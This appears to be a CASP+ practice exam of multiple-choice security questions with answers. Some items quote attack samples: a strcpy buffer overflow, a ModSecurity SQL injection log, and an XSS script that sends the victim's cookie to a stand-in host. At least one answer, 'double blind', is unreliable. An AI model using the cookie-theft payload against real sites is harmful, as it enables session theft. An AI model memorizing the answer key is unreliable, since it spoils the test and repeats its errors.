CAS-003 CompTIA Advanced Security Practitioner (CASP+) Exam Set 5

The following is what type of attack?

#include <string.h>

char *code = "AAAABBBBCCCCDDD"; // 16 bytes including the terminating '\0'

int main(void)
{
    char buf[8];
    strcpy(buf, code);
    return 0;
}



Options are :

  • b. CSRF
  • c. SQL injection
  • a. XSS
  • d. buffer overflow

Answer : d. buffer overflow

Which of the following is a process in which instructions can be sent remotely to a mobile device to erase all the data when the device is stolen?



Options are :

  • d. PRL
  • b. SCEP
  • a. memory dump
  • c. remote wipe

Answer : c. remote wipe

What type of attack is illustrated in the following output?

<SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>



Options are :

  • a. insecure direct object references
  • b. XSS
  • c. CSRF
  • d. click-jacking

Answer : b. XSS

Which IDS type analyzes traffic and compares it to attack or state patterns that reside within the IDS database?



Options are :

  • b. protocol anomaly-based IDS
  • d. traffic anomaly-based IDS
  • a. signature-based IDS
  • c. rule- or heuristic-based IDS

Answer : a. signature-based IDS

Which of the following are individual settings in an MDM configuration profile?



Options are :

  • a. payloads
  • b. plug-ins
  • d. wrappers
  • c. signatures

Answer : a. payloads

Which of the following is used to provision certificates to network devices, including mobile devices?



Options are :

  • c. COPE
  • a. SCEP
  • b. BYOD
  • d. OSCP

Answer : a. SCEP

Which attack involves unauthorized access to a device using a Bluetooth connection?



Options are :

  • d. Bluefilling
  • a. Bluesnarfing
  • b. Bluejacking
  • c. Bluefishing

Answer : a. Bluesnarfing

Which of the following is used to manage a device using Telnet?



Options are :

  • c. USB
  • a. data interface
  • d. Bluetooth
  • b. management interface

Answer : b. management interface

Which DAM architecture uses a sensor attached to the database and continually polls the system to collect the SQL statements as they are being performed?



Options are :

  • b. log-based model
  • c. memory-based model
  • d. signature-based model
  • a. interception-based model

Answer : c. memory-based model

Which organization first brought forward the idea of a trusted operating system?



Options are :

  • b. TCSEC
  • c. INTERNIC
  • d. IANA
  • a. IEEE

Answer : b. TCSEC

Which implementation of DLP is installed at network egress points?



Options are :

  • a. imprecise
  • d. endpoint
  • b. precise
  • c. network

Answer : c. network

Which strategy calls for an organization to purchase mobile devices and the users to manage those devices?



Options are :

  • c. VNC
  • b. BYOD
  • d. RFB
  • a. COPE

Answer : a. COPE

Which of the following is not a safe computing practice?



Options are :

  • b. Enable autorun.
  • a. Perform daily scans.
  • c. Don’t click on email links or attachments.
  • d. Keep anti-malware applications current.

Answer : b. Enable autorun.

The following is an example of what type of rule set?

iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP

iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

iptables -A INPUT -i eth1 -s 172. -j DROP


Options are :

  • c. ipconfig
  • d. ipcmp
  • a. iptables
  • b. ipchains

Answer : a. iptables

The following is an example of what type of attack?


Message: Access denied with code 403 (phase 2). Pattern match "\bunion\b.{1,100}?\bselect\b" at ARGS:$id. [data "union all select"] [severity "CRITICAL"] [tag "WEB_ATTACK"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"]

Action: Intercepted (phase 2) Apache-Handler: php5-script



Options are :

  • b. improper exception handling
  • a. SQL injection
  • d. CSRF
  • c. XSS

Answer : a. SQL injection

Which of the following is a list of radio frequencies residing in the memory of some kinds of digital phones?



Options are :

  • b. PRL
  • c. PRI
  • d. RCP
  • a. VNC

Answer : b. PRL

Which IPv4-to-IPv6 transition mechanism assigns addresses and creates host-to-host tunnels for unicast IPv6 traffic when IPv6 hosts are located behind IPv4 network address translators?



Options are :

  • d. Teredo
  • b. 6to4
  • c. dual stack
  • a. GRE tunnels

Answer : d. Teredo

In which type of test is the tester provided with limited knowledge of the network systems and devices, does the tester perform the test using publicly available information only, and does the organization’s security team know that an attack is coming?



Options are :

  • a. blind
  • d. fuzz
  • b. target
  • c. double blind

Answer : c. double blind

Which testing method injects invalid or unexpected input into an application to test how the application reacts?



Options are :

  • c. white box
  • d. SQL injection
  • b. fuzzing
  • a. MAC spoofing

Answer : b. fuzzing

In what type of web attack does the website think that a request came from the user’s browser and was made by the user himself, when actually the request was planted in the user’s browser?



Options are :

  • a. insecure direct object references
  • c. CSRF
  • d. click-jacking
  • b. XSS

Answer : c. CSRF

Which form of HSM is specifically suited to mobile apps?



Options are :

  • a. USB
  • d. microSD
  • b. serial
  • c. Ethernet

Answer : d. microSD

Which of the following is not a single protocol but a framework for port-based access control?



Options are :

  • d. RDP
  • c. EAP
  • b. CHAP
  • a. PAP

Answer : c. EAP

What services allow for changes to an operating system to be detected by an authorized party?



Options are :

  • c. verification
  • d. bonding
  • a. sealing
  • b. attestation

Answer : b. attestation

Which organization maintains a list of the top 10 attacks on an ongoing basis?



Options are :

  • a. WASC
  • c. BSI
  • d. ISO
  • b. OWASP

Answer : b. OWASP

What design measure is the solution to most XSS and CSRF attacks?



Options are :

  • b. input validation
  • d. ACLs
  • a. iptables
  • c. tripwire

Answer : b. input validation

ACLs are susceptible to what type of attack?



Options are :

  • a. MAC spoofing
  • c. whaling
  • b. IP spoofing
  • d. DNS poisoning

Answer : b. IP spoofing

What port number does HTTPS use?



Options are :

  • a. 80
  • b. 443
  • d. 69
  • c. 23

Answer : b. 443

What behavior occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space?



Options are :

  • c. race condition
  • d. memory leak
  • a. integer overflow
  • b. buffer overflow

Answer : a. integer overflow

Which of the following creates an encrypted area to hold and quarantine corporate data separately from that of the users?



Options are :

  • a. virtualization
  • b. containerization
  • d. VNC
  • c. COPE

Answer : b. containerization

Which of the following is a graphical desktop sharing system that uses the Remote Frame Buffer (RFB) protocol to remotely control another computer?



Options are :

  • d. RCP
  • a. RDP
  • c. NAC
  • b. VNC

Answer : b. VNC
